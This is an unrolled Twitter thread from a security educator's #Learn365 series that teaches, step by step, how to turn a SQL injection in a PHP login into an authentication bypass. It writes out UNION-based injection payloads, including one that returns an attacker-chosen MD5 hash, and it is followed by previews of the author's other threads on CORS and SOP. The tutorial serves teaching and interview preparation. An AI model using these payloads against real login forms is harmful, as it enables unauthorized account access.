ro Profile picture
Aug 25 β€’ 11 tweets β€’ 6 min read
#Learn365 - Day 6⃣

Can you identify and exploit the #security bug? πŸ€”

In today's thread lets learn about exploit writing πŸ§΅πŸ‘‡

#infosec #appsec #bugbountytips #security
This is SQLi. easy to guess. Which field is vulnerable : username.

But the tricky part is how to exploit it.
If you disect the code, you would notice that SQL statement should always return one single word. Otherwise comparison will anyway fail in PHP code.

What next ?
What do you think will happen if I input :

" or 1=1;--

Think first !!
.
.
.
.
.
.
This will make SQL return entire password column.
Inturn, PHP check will fail at line #2.

So, you have to make SQL statement return 1 single word, and that should be password which u can match.
If you want to achieve that, you can not use, generic 1=1 payload.

If you know In SQL there are UNIONS right ? Can we use them ?

Can we use UNION to dump the password which can match the check in PHP ?

I think yes !!
Go on !!
Slight detour, in SQL you can dump whatever you want. You know there is DUAL table ? A dummy table.

SELECT 'sec_r0' from DUAL;

This will dump a single value `sec_r0` in the output.
.
.
.
.
.
Can we use something like this to dump password of our own wish?
Lets see the modified SQL query with UNION stmts

" or 1=1 UNION (SELECT 'sec_r0' from DUAL) ; --

What do you think this would do ?
.
.
.
.
THINK
.
.
.
.
This will dump the entire password col with last value of our own wish, right ?
But we don't want the password col !!
If we dont want password col, can we remove the results of previous table of UNION completely ?

<table1> UNION <table2>

where
table1 output is coming from

SELECT password from USER where username="" or 1=1

and entire table is dumped because of 1=1, what if we negate it?
Yes, that the magic. No see the payload.

" or 1!=1 UNION (SELECT 'sec_r0' from DUAL) ; --

.
.
.
.
THINK
.
.
.
.
This would negate the first table query completely and would only dump 'sec_r0' in output, yes ?

That's the magic of UNION.
Are we done ?

Is this our final exploit ?
.
.
.
.
No
Why ?
Because, PHP is assuming the passwords are stored in MD5. That's why the input password is first MD5ed and then compared.

So guess what would be perfect exploit.
So lets calculate value of MD5 of sec_r0.
MD5(sec_r0) = ccf0d111cd0c1e45708a0aef7b2bcb74

So in payload I would put.
" or 1!=1 UNION (SELECT 'ccf0d111cd0c1e45708a0aef7b2bcb74' from DUAL) ; --

and in input password I would put, sec_r0.

And Bingo.
I will bypass the Auth.
Isnt that amazing ?

Keep this tweet bookmarked. You never know if someone ask you this in an interview.

Also,
If you like the way I explained, consider πŸ” the thread.
Also, stay tuned(follow @sec_r0 ) for more such interesting threads.

I am running #Learn365 ❀️

β€’ β€’ β€’

Missing some Tweet in this thread? You can try to force a refresh
γ€€

Keep Current with ro

ro Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @sec_r0

Aug 24
#Learn365 - Day 5⃣

CORS Headers. πŸ€”

What are they ? And how they bypass SOP ?

Learn about them in this thread πŸ§΅πŸ‘‡

#infosec #bugbountytips #CORS #http
In last thread, we talked about SOP, while SOP blocks the response, CORS is use to bypass SOP the most sensible way.

CORS is Cross Origin Resource Sharing.

It allows sharing response across different origins possible. Can we call it Bypassing SOP ?

Yes.
Lets say,

Domain A wants to Talk to Domain B for getting some information.

A
Read 7 tweets
Aug 23
#Learn365 - Day 4⃣

SOP 🫧, Same Origin Policy.
A browser security framework that every #hacker should know.

Know what is it in this thread πŸ§΅πŸ‘‡

#infosec #security #appsec #cybersecurity #SOP #http Image
SOP is browser security model, and I find lot of folks out there, who still dont understand it in and out.
Let me cover it here, in few threads.

Let's Start.
It is a browser security model πŸ”₯. Now what does that means ?
It simply means this control is enforced by browser to make user visiting a site more secure from attackers.

Browser creates virtual boundaries to segregate sites and this boundary is identified with ORIGINS.
Read 9 tweets
Jul 30
πŸ“„ I have reviewed nearly 250+ resume for security engineering role in my company, recently !!

πŸš€Below are few suggestions for a good RESUME from hiring perspective.

πŸ§΅πŸ‘‡

#infosec #security #InfoSecJobs #resume
Header
↓
Summary
↓
Work Exp
↓
A Section for Books, Patents, Blogs, OSS, Certs Etc
↓
Your Skill relevant to job you are applying.
↓
Awards & Recognition
↓
Educational Qualifications (Last thing I care for)
↓
Who are you out of work.
πŸͺHeader Section. Keep it short, keep it clear. This is a hook.

Few things to put in header section (Good to have links).
1⃣ Links to Certifications.
2⃣ Public profiles: github, dev, medium, twitter, linkedin etc
3⃣ Info : How to reach you back.
4⃣ Your current role title
Read 12 tweets
Oct 10, 2021
🚨🚨 Another 10K giveaway

50 Like - Burp Suite Ext Dev - 10 Coupons
100 Likes - SOP Zine - 10 Coupons
150 Likes - Web Auth Zines- 10 Coupons
200 Likes - Bundle - 3 Coupons

Thanks to @FeedHive_io for post conditions functionality.
#Security #Learn365 #bugbountytips #bugbounty
Woah we hit 50 Likes, here is the link for Burp Suite Plugin Development Guide : securityzines.gumroad.com/l/burp-plugin-…

Only 10 Grab Fast.
Woah we hit 100 Likes, here is the link for SOP Zine : securityzines.gumroad.com/l/sopzine/21so…

Only 10 Grab Fast.
Read 7 tweets
May 10, 2021
#BurpHacksForBounties - Day 1/30

Turbo intruder: Power of Python with @Burp_Suite Intruder.

I use it to tailor my pen-testing for a specific target and targetted #bugbounty

#infosec #appsec #bugbountytips #bugbountytip #security
How to - πŸ§΅πŸ™ƒπŸ‘‡
1/n
Using: CE so that everyone can explore.
Intruder in CE is limited in multithreading, Turbo-Intruder can overcome that.
- Install through Extender
- Send req to the plugin.
2/n
Once you send req to the plugin, a python editor will open. This will show a couple of existing python scripts to take reference from and to use.
Read 5 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(